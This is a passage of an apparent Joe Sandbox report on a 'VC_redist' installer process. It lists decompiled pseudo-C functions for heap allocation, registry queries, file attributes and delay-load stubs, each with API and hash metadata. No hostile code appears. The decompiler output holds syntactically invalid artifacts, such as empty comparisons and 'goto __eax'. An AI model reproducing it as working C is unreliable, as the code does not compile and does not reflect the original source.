                                                                          				intOrPtr _t49;
                                                                          				void* _t51;
                                                                          				intOrPtr* _t52;
                                                                          				void* _t56;
                                                                          
                                                                          				_t52 = _a52;
                                                                          				_t29 =  *((intOrPtr*)(_t52 + 4));
                                                                          				if(_t29 != 0) {
                                                                          					L2:
                                                                          					_t42 =  *_t29;
                                                                          				} else {
                                                                          					_t29 =  *((intOrPtr*)(_t52 + 8));
                                                                          					if(_t29 == 0) {
                                                                          						_t42 = 0;
                                                                          					} else {
                                                                          						goto L2;
                                                                          					}
                                                                          				}
                                                                          				_t30 =  *((intOrPtr*)(_t52 + 0xc));
                                                                          				if(_t30 == 0) {
                                                                          					_a52 = 0;
                                                                          				} else {
                                                                          					_a52 =  *_t30;
                                                                          				}
                                                                          				_t46 =  *((intOrPtr*)(_t52 + 0x10)) + _a12;
                                                                          				_t48 =  *(_t52 + 0x14);
                                                                          				asm("adc edx, [ebp+0x14]");
                                                                          				_t56 =  *(_t52 + 0x14) -  *(_t52 + 0x1c);
                                                                          				if(_t56 >= 0 && (_t56 > 0 || _t46 >  *(_t52 + 0x18))) {
                                                                          					_t46 =  *(_t52 + 0x18);
                                                                          					_t48 =  *(_t52 + 0x1c);
                                                                          				}
                                                                          				if(( *(_t52 + 0x18) |  *(_t52 + 0x1c)) == 0) {
                                                                          					_t49 = 0;
                                                                          				} else {
                                                                          					_t49 = E000DE120(E000DE080(_t46, _t48, 0x64, 0), _t48,  *(_t52 + 0x18),  *(_t52 + 0x1c));
                                                                          				}
                                                                          				_t34 =  *((intOrPtr*)( *_t52 + 0x10));
                                                                          				_t37 = E000BD409( *_t52, 0, 1,  *((intOrPtr*)( *_t34 + 0x94))(_t34, _t42, _a52, _a12, _a16, _a4, _a8, _t49)) + 1;
                                                                          				if(_t37 > 0xc) {
                                                                          					L17:
                                                                          					 *((intOrPtr*)(_t52 + 0x24)) = 1;
                                                                          					goto L18;
                                                                          				} else {
                                                                          					switch( *((intOrPtr*)(_t37 * 4 +  &M000D99FC))) {
                                                                          						case 0:
                                                                          							goto L17;
                                                                          						case 1:
                                                                          							goto L19;
                                                                          						case 2:
                                                                          							 *((intOrPtr*)(_t52 + 0x20)) = 1;
                                                                          							L18:
                                                                          							_t51 = 1;
                                                                          							goto L19;
                                                                          					}
                                                                          				}
                                                                          				L19:
                                                                          				return _t51;
                                                                          			}














                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: __aulldiv
                                                                          • String ID:
                                                                          • API String ID: 3732870572-0
                                                                          • Opcode ID: c376ef3ff67b7fb1bf85b9c69d9945b961142c51204d39830a96e4794472f349
                                                                          • Instruction ID: 20bc38a50f8c476ddd635967489a42a70305d84e1a2fbdcf8524c269139ee183
                                                                          • Opcode Fuzzy Hash: c376ef3ff67b7fb1bf85b9c69d9945b961142c51204d39830a96e4794472f349
                                                                          • Instruction Fuzzy Hash: E921F371200705AFDB60DE5AC890D6BF7FAEF897507148A1EFA8687711C231E852CB70
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 93%
                                                                          			E000F907D(void* __ebx, void* __ecx, void* _a4, intOrPtr _a8, char** _a12, char** _a16, char** _a20) {
                                                                          				void* _v8;
                                                                          				void* _v12;
                                                                          				void* _t28;
                                                                          				void* _t33;
                                                                          				void* _t43;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t43 = E000F8CFB(__ecx, _a8,  &_v12);
                                                                          				if(_t43 < 0) {
                                                                          					L11:
                                                                          					if(_v8 != 0) {
                                                                          						RegCloseKey(_v8); // executed
                                                                          						_v8 = 0;
                                                                          					}
                                                                          					if(_v12 != 0) {
                                                                          						E000F54EF(_v12);
                                                                          					}
                                                                          					return _t43;
                                                                          				}
                                                                          				_t28 = E000F0E3F(_a4, _v12, 0x20019,  &_v8); // executed
                                                                          				_t43 = _t28;
                                                                          				if(_t43 != 0x80070002) {
                                                                          					if(_t43 < 0) {
                                                                          						L10:
                                                                          						goto L11;
                                                                          					}
                                                                          					if(_a12 == 0) {
                                                                          						L6:
                                                                          						if(_a16 == 0) {
                                                                          							L8:
                                                                          							if(_a20 != 0) {
                                                                          								_t43 =  ==  ? 0 : E000F124D(_v8,  *0x11a7cc, _a20);
                                                                          							}
                                                                          							goto L10;
                                                                          						}
                                                                          						_t43 =  ==  ? 0 : E000F0F6E(_v8,  *0x11a7d0, _a16);
                                                                          						if(_t43 < 0) {
                                                                          							goto L10;
                                                                          						}
                                                                          						goto L8;
                                                                          					}
                                                                          					_t33 = E000F0F6E(_v8, 0, _a12); // executed
                                                                          					_t43 =  ==  ? 0 : _t33;
                                                                          					if(_t43 < 0) {
                                                                          						goto L10;
                                                                          					}
                                                                          					goto L6;
                                                                          				}
                                                                          				_t43 = 0x80070490;
                                                                          				goto L10;
                                                                          			}









                                                                          APIs
                                                                            • Part of subcall function 000F8CFB: lstrlenW.KERNEL32(00000100,?,?,000F9098,000002C0,00000100,00000100,00000100,?,?,?,000D7B40,?,?,000001BC,00000000), ref: 000F8D1B
                                                                          • RegCloseKey.KERNELBASE(000002C0,000002C0,00000100,00000100,00000100,?,?,?,000D7B40,?,?,000001BC,00000000,00000000,00000000,00000100), ref: 000F9136
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenlstrlen
                                                                          • String ID:
                                                                          • API String ID: 514153755-0
                                                                          • Opcode ID: 38e53e57fe1c1d007fa493198595e0b1ca1cfcb63e4999e60585d501feb6c20e
                                                                          • Instruction ID: a6525e5d87104132fd5c64456f1727608f682b83870b613a900849d94e7c1844
                                                                          • Opcode Fuzzy Hash: 38e53e57fe1c1d007fa493198595e0b1ca1cfcb63e4999e60585d501feb6c20e
                                                                          • Instruction Fuzzy Hash: 6A214172C0152EEBCF22AFA4CC459FEBAB5EB44750B114675EA01A7921D6324E50BBD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			E000F5728(void* __ecx, intOrPtr _a4, short* _a8, intOrPtr _a12, char** _a16) {
                                                                          				void* _v8;
                                                                          				void* _t13;
                                                                          				char** _t24;
                                                                          				void* _t27;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_v8 = 0;
                                                                          				_t13 = E000F5664(__ecx, _a4,  &_v8); // executed
                                                                          				_t24 = _a16;
                                                                          				_t27 = _t13;
                                                                          				if(_t27 == 0x80070002 || _t27 == 0x80070003) {
                                                                          					L5:
                                                                          					_t27 = 1;
                                                                          					goto L6;
                                                                          				} else {
                                                                          					if(_t27 < 0) {
                                                                          						L6:
                                                                          						if(_v8 != 0) {
                                                                          							RegCloseKey(_v8);
                                                                          							_v8 = 0;
                                                                          						}
                                                                          						if(_t27 == 1 || _t27 < 0) {
                                                                          							if(_a12 != 0) {
                                                                          								_t27 = E000B21A5(_t24, _a12, 0);
                                                                          							} else {
                                                                          								if( *_t24 != 0) {
                                                                          									E000F54EF( *_t24);
                                                                          									 *_t24 = 0;
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          						return _t27;
                                                                          					}
                                                                          					_t27 = E000F0F6E(_v8, _a8, _t24);
                                                                          					if(_t27 == 0x80070002 || _t27 == 0x80070003) {
                                                                          						goto L5;
                                                                          					} else {
                                                                          						goto L6;
                                                                          					}
                                                                          				}
                                                                          			}








                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,0011AAA0,00000000,?,00000000,?,000C890E,WiX\Burn,PackageCache,00000000,0011AAA0,00000000,?,?), ref: 000F5782
                                                                            • Part of subcall function 000F0F6E: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,?), ref: 000F0FE4
                                                                            • Part of subcall function 000F0F6E: RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 000F101F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$Close
                                                                          • String ID:
                                                                          • API String ID: 1979452859-0
                                                                          • Opcode ID: ac70181026885921c9c2aeb9d13c70f8461657c37c5c187a12f5ac4a276cd0a7
                                                                          • Instruction ID: cc42ccf2dca8ecbf6e78b3ca41d469325a2b5da42c317b02532bd0574ae26317
                                                                          • Opcode Fuzzy Hash: ac70181026885921c9c2aeb9d13c70f8461657c37c5c187a12f5ac4a276cd0a7
                                                                          • Instruction Fuzzy Hash: 7311A336804B2DEBCB217EA4FC819BEB6A5EB44322B150239EF1167911C3314D50FAD0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 95%
                                                                          			E000E523F(void* __ecx, signed int _a4, signed int _a8) {
                                                                          				void* _t8;
                                                                          				void* _t12;
                                                                          				signed int _t13;
                                                                          				void* _t15;
                                                                          				signed int _t16;
                                                                          				signed int _t18;
                                                                          				long _t19;
                                                                          
                                                                          				_t15 = __ecx;
                                                                          				_t18 = _a4;
                                                                          				if(_t18 == 0) {
                                                                          					L2:
                                                                          					_t19 = _t18 * _a8;
                                                                          					if(_t19 == 0) {
                                                                          						_t19 = _t19 + 1;
                                                                          					}
                                                                          					while(1) {
                                                                          						_t8 = RtlAllocateHeap( *0x11b5b8, 8, _t19); // executed
                                                                          						if(_t8 != 0) {
                                                                          							break;
                                                                          						}
                                                                          						__eflags = E000E4A8E();
                                                                          						if(__eflags == 0) {
                                                                          							L8:
                                                                          							 *((intOrPtr*)(E000E3E36())) = 0xc;
                                                                          							__eflags = 0;
                                                                          							return 0;
                                                                          						}
                                                                          						_t12 = E000E4ADD(_t15, _t16, __eflags, _t19);
                                                                          						_pop(_t15);
                                                                          						__eflags = _t12;
                                                                          						if(_t12 == 0) {
                                                                          							goto L8;
                                                                          						}
                                                                          					}
                                                                          					return _t8;
                                                                          				}
                                                                          				_t13 = 0xffffffe0;
                                                                          				_t16 = _t13 % _t18;
                                                                          				if(_t13 / _t18 < _a8) {
                                                                          					goto L8;
                                                                          				}
                                                                          				goto L2;
                                                                          			}











                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,000E6113,00000001,00000364), ref: 000E5280
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: d55358489f8bed0e93b467f65386de7c7a6e0304d0a31fe074f6a2b3bcff43c6
                                                                          • Instruction ID: fecd06b533485c116870f1271f4bfdd8447dc3feeaabf8f3607ba89d5315dc08
                                                                          • Opcode Fuzzy Hash: d55358489f8bed0e93b467f65386de7c7a6e0304d0a31fe074f6a2b3bcff43c6
                                                                          • Instruction Fuzzy Hash: 3AF02B315449A05E9FB45A638C04A9F37889F43775B1D4915EE04BB181CB20DC004AD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 94%
                                                                          			E000E5154(void* __ecx, long _a4) {
                                                                          				void* _t4;
                                                                          				void* _t6;
                                                                          				void* _t7;
                                                                          				void* _t8;
                                                                          				long _t9;
                                                                          
                                                                          				_t7 = __ecx;
                                                                          				_t9 = _a4;
                                                                          				if(_t9 > 0xffffffe0) {
                                                                          					L7:
                                                                          					 *((intOrPtr*)(E000E3E36())) = 0xc;
                                                                          					__eflags = 0;
                                                                          					return 0;
                                                                          				}
                                                                          				if(_t9 == 0) {
                                                                          					_t9 = _t9 + 1;
                                                                          				}
                                                                          				while(1) {
                                                                          					_t4 = RtlAllocateHeap( *0x11b5b8, 0, _t9); // executed
                                                                          					if(_t4 != 0) {
                                                                          						break;
                                                                          					}
                                                                          					__eflags = E000E4A8E();
                                                                          					if(__eflags == 0) {
                                                                          						goto L7;
                                                                          					}
                                                                          					_t6 = E000E4ADD(_t7, _t8, __eflags, _t9);
                                                                          					_pop(_t7);
                                                                          					__eflags = _t6;
                                                                          					if(_t6 == 0) {
                                                                          						goto L7;
                                                                          					}
                                                                          				}
                                                                          				return _t4;
                                                                          			}









                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,000E1E90,?,0000015D,00000001,?,00000001,?,000E32E9,000000FF,00000000,?,?), ref: 000E5186
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: db854789378e986be90772cdc8923b68b8dc2a4b6fa2439fa832bdcae9e12be7
                                                                          • Instruction ID: e8e9216ae83b5d14d2d5d44e0a8bed756ec7938cd5384bce6c3c7bdf983ab4de
                                                                          • Opcode Fuzzy Hash: db854789378e986be90772cdc8923b68b8dc2a4b6fa2439fa832bdcae9e12be7
                                                                          • Instruction Fuzzy Hash: AFE02B31240BE49FD67127278C14B9F368DDF827FAF0945A1AC25B24C1DB20CC0085E2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00000000,00000000,00000104,00000000,?,000C89CA,0000001C,?,00000000,?,?), ref: 000B34E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: FolderPath
                                                                          • String ID:
                                                                          • API String ID: 1514166925-0
                                                                          • Opcode ID: 37976d65373f452f82d1d9c5494d9d35b6512d1c0efb7aa2230f4161a9818ace
                                                                          • Instruction ID: bf0052ffde5eb6fdf5739cbe24fa7670f5faa487edff25b7cfafc8d44f7fe93c
                                                                          • Opcode Fuzzy Hash: 37976d65373f452f82d1d9c5494d9d35b6512d1c0efb7aa2230f4161a9818ace
                                                                          • Instruction Fuzzy Hash: 1CE05B723012257BE7022E729C05DEB7B9CDF057507048061FE44D6001EB75FA1097B0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000B40E2(WCHAR* _a4, signed char* _a8) {
                                                                          				signed char _t5;
                                                                          				signed char* _t7;
                                                                          				void* _t8;
                                                                          
                                                                          				_t8 = 0; // executed
                                                                          				_t5 = GetFileAttributesW(_a4); // executed
                                                                          				if(_t5 != 0xffffffff && (_t5 & 0x00000010) != 0) {
                                                                          					_t7 = _a8;
                                                                          					if(_t7 != 0) {
                                                                          						 *_t7 = _t5;
                                                                          					}
                                                                          					_t8 = 1;
                                                                          				}
                                                                          				return _t8;
                                                                          			}







                                                                          APIs
                                                                          • GetFileAttributesW.KERNELBASE(?,00000000,?,000CA229,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,?), ref: 000B40EB
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: a165cfa386b775d9f7a31527f4e4870f2d6807a757399eccedf00c187e2aa5cc
                                                                          • Instruction ID: f06497690b83f8ff0eb42348b16ce79ea33c1318a614a4a7b7d25ae90516768d
                                                                          • Opcode Fuzzy Hash: a165cfa386b775d9f7a31527f4e4870f2d6807a757399eccedf00c187e2aa5cc
                                                                          • Instruction Fuzzy Hash: 3CD02E32A02128174B288EAD8C045EABBAAEF227B03418614EC14CA2A1C3308E92C7C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E000EF349() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E000F9814(_t3, _t5, _t7, 0x118024, 0x11a94c); // executed
                                                                          				goto __eax;
                                                                          			}







                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000EF35B
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: 291f07788fb6ba882ed62f3ea5f0303f4700260d5959dc25b21f02156dfe8845
                                                                          • Instruction ID: decec4ef5b5a44e1e2b788ab3e78b7f989e2d585ba53a911e55ae576dca9828f
                                                                          • Opcode Fuzzy Hash: 291f07788fb6ba882ed62f3ea5f0303f4700260d5959dc25b21f02156dfe8845
                                                                          • Instruction Fuzzy Hash: F8B0129235944A7C330C13216E02CBA025DC7C1F28335C03AB600E1041ED800EC61032
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E000EF36A() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E000F9814(_t3, _t5, _t7, 0x118024, 0x11a944); // executed
                                                                          				goto __eax;
                                                                          			}

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000EF35B
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: 031608565aeee76063337dae9bf4fb38df24fc1e86ff8341a0a899a96a3312cd
                                                                          • Instruction ID: d4afa218da0abd9515d8deacf1ec1c76fea5baa5cc82e7dcf5f52259aa90a4e7
                                                                          • Opcode Fuzzy Hash: 031608565aeee76063337dae9bf4fb38df24fc1e86ff8341a0a899a96a3312cd
                                                                          • Instruction Fuzzy Hash: 8FB0129135940A6D334C53251F03DBA015DC7C5F24335C03AB100D2042ED800DC71032
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E000EF37A() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E000F9814(_t3, _t5, _t7, 0x118024, 0x11a948); // executed
                                                                          				goto __eax;
                                                                          			}

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000EF35B
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: f24a0e5f3918568ddc78417073d60e84f1a084c76e29267fe33030485de32c02
                                                                          • Instruction ID: 6bea6d4c783592ccafe80d67fbf98869df513f02196676febcdcdd9364c31a91
                                                                          • Opcode Fuzzy Hash: f24a0e5f3918568ddc78417073d60e84f1a084c76e29267fe33030485de32c02
                                                                          • Instruction Fuzzy Hash: B4B0129135950A6C334C53251E02DBA015DC7C5F24335C13AF100D6041ED800DC65032
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E000F94D5() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E000F9814(_t3, _t5, _t7, 0x1180c4, 0x11a960); // executed
                                                                          				goto __eax;
                                                                          			}

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000F94E7
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                          • String ID:
                                                                          • API String ID: 697777088-0
                                                                          • Opcode ID: 5692c1e25848d871effe21bb871106bed757069c74a5b9d95d2041fb4f81a1c5
                                                                          • Instruction ID: 302ccc452316bd12fca37580b6f1517a2dbdd06b5f7f2d759f6393785be6982b
                                                                          • Opcode Fuzzy Hash: 5692c1e25848d871effe21bb871106bed757069c74a5b9d95d2041fb4f81a1c5
                                                                          • Instruction Fuzzy Hash: 49B0128526960D7C331C22151D82DBA011CDBC0F20331C17BB300E28C1AE401CC76033
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E000F94F6() {
                                                                          				void* _t3;
                                                                          				void* _t5;
                                                                          				void* _t7;
                                                                          
                                                                          				_push(_t3);
                                                                          				_push(_t5);
                                                                          				E000F9814(_t3, _t5, _t7, 0x1180c4, 0x11a95c); // executed
                                                                          				goto __eax;
                                                                          			}

                                                                          APIs
                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 000F94E7
                                                                            • Part of subcall function 000F9814: DloadAcquireSectionWriteAccess.DELAYIMP ref: 000F9829
                                                                            • Part of subcall function 000F9814: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000F9891
                                                                            • Part of subcall function 000F9814: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000F98A2
                                                                          Memory Dump Source
